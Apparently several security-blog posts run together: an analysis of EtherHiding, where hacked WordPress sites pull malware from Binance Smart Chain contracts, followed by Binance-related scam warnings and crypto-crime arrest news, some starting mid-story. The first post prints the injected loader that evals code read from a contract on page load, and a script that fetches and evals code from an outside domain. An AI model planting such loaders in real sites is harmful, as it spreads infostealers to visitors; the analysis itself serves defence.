Cybercriminals Use BSCs As C2 Infrastructure

A new technique, coined EtherHiding, was described over half a year ago, in October 2023. Analysts noticed the shift in the networking patterns of a now-old scheme that tricks users into installing malware disguised as browser updates. Instead of pulling the malicious code from Cloudflare Workers, they now direct their request towards smart contracts on Binance.

Smart contracts, in their essence, are code elements that are executed when certain conditions are met, in this case – a correct request is sent. This makes them similar to Cloudflare Workers, which effectively allowed frauds to use genuine Cloudflare servers to host malicious code delivery. The only difference here though is that smart contracts are hosted on a blockchain, which makes them nearly impossible to take down. And this is probably why cybercriminals started to pay them so much attention, aside from the fact these contracts are dirt cheap. But more on that later.

How Malware Spreads via Binance Smart Contracts?

Attack chain begins with compromising a website; hackers usually target WordPress sites, due to the numerous vulnerabilities in WP as site engine and the selection of vulnerabilities in popular plugins. After compromising the website, hackers set a specific script that communicates with Binance web API.

async function load() {
let provider = new ethers.providers.JsonRpcProvider("https://bsc-dataseed1.binance.org/"),
signer = provider.getSigner(),
address = "0x7f36D9292e7c70A204faCC2d255475A861487c60",
ABI = [
{ inputs: [{ internalType: "string", .......},
{ inputs: [], name: "get", ......},
{ inputs: [], name: "link", ....... },
],
contract = new ethers.Contract(address, ABI, provider),
link = await contract.get();
eval(atob(link));
}
window.onload = load;

In between these operations, attackers create a new smart contract, and add the malicious code to it through the update function of the contract. This locks the entire scheme in the “ready-to-fire” position.

After entering the compromised site, the user triggers the mechanism, making the website send the get() request to the associated smart contract. The response contains a binary code string; through using the eval() function, hackers make the user’s browser execute this code. This is what defaces the website and causes the “update browser” banner to appear.

Experienced users may feel something fishy happening, as browsers never ask for the update in such a manner, but the majority of people will take it for granted. Clicking the “Update …” button on that image will execute the script grabbed from the smart contract and download the final payload. Cybercriminals typically use a bunch of one-day websites that return the payload. At the moment, malware like Lumma Stealer, Redline and Vidar use this scheme the most.

const get_k_script = () => {
let e = new XMLHttpRequest();
return e.open("GET", "https://921hapudyqwdvy[.]com/vvmd54/", !1), e.send(null), e.responseText;
};
eval(get_k_script());

Is this new practice dangerous?

It is hard to estimate the dangers that come from this trick, but it has several major benefits compared to all other methods adversaries used in the past.

The most noticeable among them is that, as I said, Binance Smart Contracts are nearly impossible to take down. Cybercriminals are ready to pay hefty sums for running their infrastructure on “bulletproof hostings”. That is a common name for ones that have little to no downtimes and do not cooperate with law enforcement. There are a few other parameters, but BSCs fulfill them all at the same time nonetheless. Being based on the blockchain of a huge crypto exchange, it is barely susceptible to DDoS attacks. And it is anonymous – at least, operating smart contracts does not require any personal data, and they does not store any info about the creator.

One more benefit, that beats even the “classic” bulletproof hostings, is the price. Binance takes pay for creating, modifying and interacting with the contract. But threat actors designed their operations in a way to minimize payments. All they pay for is the creation fee, and then a payment for each update, but the sum is so miserable ($0.2 – $0.6) that the attackers can modify things almost daily.

Overall, this new modus operandi may bring dramatic changes to how malware is spreading nowadays. Series of recent disruptions of operations made it clear that the previous model does not have a promising future, to say the least. With the abuse of smart contracts, regardless of the blockchain they’re based off, the malware spreading may take a new sharp turn up.

Protecting Against Malicious Binance Smart Contracts

Despite the scheme with malicious Binance contracts looks quite hard to disrupt, the overall attack consists of numerous steps. And that is where a proper anti-malware software will be able to intercept and stop the malware. GridinSoft Anti-Malware will grant you with exceptional protection against both network threats and deeply-disguised malware on the disk.

The post Binance Smart Contracts Blockchain Abused in Malware Spreading appeared first on Gridinsoft Blog.

What happened to Binance?

On March 27, 2023, Binance was charged by Commodity Futures Trading Commission for consistently violating its regulations for preventing money laundering and terrorism financing. As the note released by CFTC says, Binance employees were guided by the company’s CEO, Changpeng Zhao to ignore the rules set by CFTC. The latter supposes uncovering the real identity of their customer in order to prevent misleading and following laundering. That thesis is partially confirmed by the fact that throughout the entire 2022, no suspicious activity reports were made.

Defendants’ alleged willful evasion of U.S. law is at the core of the Commission’s complaint against Binance. The defendants’ own emails and chats reflect that Binance’s compliance efforts have been a sham and Binance deliberately chose – over and over – to place profits over following the law, — Gretchen Lowe, CFTC’s Enforcement Division Principal Deputy Director

Currently, Binance is just amidst a huge scandal, which, however, does nothing to disrupt the operation flow. Still, the trial is ongoing, and the situation may change in the future. If the evidence possessed by the accusing party is proven true, the platform may have serious consequences.

First and foremost, regulators can ban Binance from the U.S., cutting a significant portion of its money flow. That ban will likely forbid the banks to wire transactions with the organisation. It will be painful, but not impossible to withstand – the US share is not that big. However, if things get worse, US authorities will ask European banks to do the same. Cutting off over 50% of the user base in a single move is deadly for pretty much any company.

What to expect?

The scale of possible scams may easily overwhelm the similar outbreak that happened following the SVB bankruptcy in early March. Hackers were sending emails pretending to be bank representatives or legal agents, offering their help in saving money held in the ceased bank. This time, however, the vast majority of targets are regular folks, who are much less aware of scams. Moreover, people are much more likely to interact with emails they receive – and cybercriminals know that.

There is, however, a difference between the case of SVB and Binance. Bankruptcy means a complete suspension of all operations – in simple words, you cannot get your money back. Ban in a certain country makes it troublesome, but not impossible. Still, it may be less obvious for people who are not so well acquainted with all the procedures. Moreover, folks mostly have no “plan B” for such a situation. That will be the bearing point of crooks.

Malicious alternatives

Nature abhors a vacuum. If Binance is gone, there are a number of other platforms offering hot wallets and easy investments. But aside from well-known names, others will pop up, offering unbelievably good terms. And for sure, it is better to remain incredulous.

The classic scheme here is offering a service to people who escaped from Binance, taking their money and leg it. These “alternatives” will likely be offered in advertisements all over the Internet, as well as on forums. Alternatively, crooks can perform classic email spamming campaigns, targeting the emails from databases related to a breach that happened back in 2019.

Typically, users will be offered bonuses at wire-in, miserable commissions per transaction, or even leverages for trading. Links, wherever they are placed, will lead to a freshly-created website that has small to no information about the service. Instead, the site will blink with numerous offers to create an account and top it up as soon as possible. Once done, you will never see your money back. This fraud may also fill the databases with personal information you share during the registration.

Wireout help offers

This type of scam may be conjoined with the previous one but requires contacting the victim. Crooks reach the victim via email, offering to migrate seamlessly to their platform. This message can also contain convincing statements about the partnership with Binance regarding their customers. Hackers may even impersonate a well-known exchange – to lull the vigilance. However, the link they will provide to proceed leads to the same poorly-made website.

At this point, things are getting more interesting. Instead of just taking your money, fraudsters can also ask the address of a Binance hot wallet and a cold wallet. This, in turn, exposes your identity even more – and may be threatening to your funds’ safety.

Pseudo-Binance mailings

What can be the most classic example of an email scam? Email messages that pretend to be ones from a genuine company. Scams related to SVB bankruptcy were generally of this sort, and now the story may repeat itself. Hackers will pretend to be the company that wants to help with wire out or other operations. Alternatively, if nothing bad happens to Binance, the legend may switch to “insure your account” stuff. This scam may take place in social media as well.

Routinely, you should log into your account by following the link added to a message. But oops – this link leads to a phishing copy of a Binance login page. This ends up with losing access to your account, which is suboptimal even in the case of troubles.

What can I do?

First of all, it is just an attempt to predict upcoming cases. If nothing happens – great; pessimistic predictions are always good when they do not come true. However, the threat of malware and phishing scams on email is as actual as never before. Following basic cybersecurity rules is a go-to advice for all cases.

Be suspicious of all the emails you receive. Check the email addresses, read the message body carefully – they can contain the signs which will uncover the attempt to scam you. Hackers do their best in mimicking the original messaging style of the companies, but cannot repeat all the details. Why do they call me “Dear user” instead of my name? And why does the sender’s email resemble a single-use one registered on a quick email box service? Notice details of this small – and any attempts to scam you will go naught.

Control social media messages. Using accounts that mimic the company one’s crooks can outreach people with relevancy. We are used to sharing a lot of information about ourselves on social networks, thus it is not a tough question to find out if you are using Binance or not. In Twitter, after the recent changes in its administration, it became even easier to counterfeit official accounts. Acting as support managers, they can easily deceive a huge number of people.

Do not trust links on the Internet. Wherever you find them – in emails or in someone’s forum post, they should not be trusted. They may look legitimate, but don’t be haste with typing your credentials or other sensitive data. First, check the URL address: if it contradicts with the contents (i.e. 1281300913.weebly.com and a PayPal login page) – close it immediately. Crooks are extremely good at copying login pages and setting up phishing traps for unsuspecting users.

The post Binance US Ban Scams Incoming: What to Expect? appeared first on Gridinsoft Blog.

The fact is that last week, as a result of a joint operation carried out with the assistance and coordination of Interpol by the law enforcement agencies of Ukraine, South Korea and the United States, six suspects were detained, somehow connected with Clop, but, obviously, this did not affect the “work” of the group.

Ukrainian police reported that they conducted 21 searches in the capital of the country and in the Kiev region, in the homes of the defendants and in their cars. As a result, were seized: computer equipment, cars (Tesla, Mercedes and Lexus) and about 5,000,000 hrivnias ($182,900) in cash, which, according to the authorities, were received from the victims as ransoms. The suspects’ property was seized.

At the same time, according to the information security company Intel 471, the Ukrainian authorities arrested people who were only involved in money laundering for Clop operators, while the main members of the hack group are most likely hide in Russia.

Although after the arrests Clop’s “work” was suspended for about a week, now Bleeping Computer reports that the ransomware has re-activated and published data on two new victims on its website on the darknet.

The researchers did not disclose the names of the affected companies, but report that the personal details of the employees were released, including documents confirming employment (for loan applications), as well as documents on withholding of wages.

It should also be said that today the Binance cryptocurrency exchange announced that it took part in a recent law enforcement operation and helped identify criminals.

Exchange representatives said that they tracked the FANCYCAT group, which is engaged in various criminal activities, including the management of a “high-risk” cryptocurrency exchange. This group laundered money for ransomware such as Clop and Petya and is generally responsible for more than $500,000,000 in damages related to ransomware, as well as laundering millions of dollars associated with other types of cybercrimes.

Binance claims to have discovered FANCYCAT together with the blockchain analyst firms TRM Labs and Crystal (BitFury), and then provided all the information it gathered to law enforcement, leading to the group’s arrest earlier this month.

Let me remind you that I also wrote that France is looking for LockerGoga ransomware developers in Ukraine.

The post Clop ransomware continues to work even after a series of arrests appeared first on Gridinsoft Blog.

The two suspects are accused of creating clone sites for the listed cryptocurrency exchanges, where they lured users and collected logins and passwords from their accounts. The stolen credentials were then used to access victims’ accounts and steal their crypto assets in Bitcoin (BTC) and Ethereum (ETH).

This phishing campaign began around June 2017, according to authorities.

“In total, attackers defrauded 313 Poloniex users, 142 Binance users and 42 Gemini users by stealing $ 16,876,000 worth of cryptocurrencies”, – says the court documents.

According to the published indictment, Potenkhin and Karasavidi were withdrawing funds stolen from other users, to intermediate accounts in various exchangers (including Poloniex, Binance, Gemini and Bittrex), created using fake documents.

In turn, the US Treasury Department reported that, despite all the efforts of hackers to launder the stolen funds on various exchanges, accounts and blockchains, experts from the US Secret Service were able to track and seize money. As a result, representatives of the Ministry of Finance wrote that they imposed sanctions on both suspects.

In addition, the Department of Justice reports that the suspects were not only involved in stealing cryptocurrencies, but also manipulated the market using cheap altcoins.

“The defendants first created several bogus accounts on the same [exchange] platform, and each of those accounts acquired a low-cost digital currency known before the manipulation as GAS”, — Justice officials said, referring to the incident that began in July 2017.

Then, on October 29, 2017, according to prosecution, the defendants took control of the accounts of the three affected [attacks] customers and used the digital currency held in their accounts, valued at more than $5,000,000 at the time, to simultaneously purchase GAS, which sharply increased demand and price. The defendants and their accomplices then quickly converted the digital currency in their fictitious accounts from GAS to Bitcoin and other digital currencies, causing the value of GAS to plummet.

Prosecutor David Anderson said that in total, two Russians face up to 59 years in prison. However, so far both suspects are not arrested, and, presumably, hide in Russia.

Let me remind you that recently the Ukrainian cyber police in cooperation with Binance detained operators of 20 cryptocurrency exchangers.

The post US Department of Justice accused two Russians of stealing $17,000,000 worth of cryptocurrency appeared first on Gridinsoft Blog.

For this, the Binance leadership created the Bulletproof Exchanger project, which should help identify malicious activity in the cryptocurrency ecosystem, as well as help track down the attackers behind it. In the framework of the project, the exchange cooperates with TRM Labs specialists.

“Hence on cryptocurrency market conducted large number of operations with money that were earned in hacker’s attacks on the international companies, spread of malware, stealing money from back accounts of foreign companies and citizens, cooperation of Ukrainian cyber police department with Binance company and its help may assist in detainment of persons, involved in such crimes”, – said head of the Ukrainian cyber police Oleksandr Grinchak.

The Bulletproof Exchanger project is already demonstrated its effectiveness. This week, the cyber police of Ukraine, together with the General Investigation Department and Binance specialists, announced the disclosure and arrest of a criminal group, three members of which operated 20 darknet exchangers and provided services for legalizing and cashing out illegally obtained money.

During 2018-2019, these people made financial transactions worth 42 million dollars. In particular, they laundered money obtained through hacker attacks on international companies and spread of malware, as well as funds stolen from bank accounts of foreign companies and citizens.

Law enforcers conducted searches, as a result of which were seized: computer equipment, weapons, ammunition and money worth more than $200,000. It is reported that during a preliminary examination of the seized equipment, the police found digital evidence of the criminal activities of the detainees.

Currently, the pre-trial investigation continues within the framework of the initiated criminal proceedings. Three defendants face up to eight years in prison for their crimes.

Let me remind you that I also talked about the fact that representatives of the French cyber police believe that in Ukraine hide LockerGoga ransomware developers.

The post Ukrainian cyber police in cooperation with Binance detained operators of 20 cryptocurrency exchangers appeared first on Gridinsoft Blog.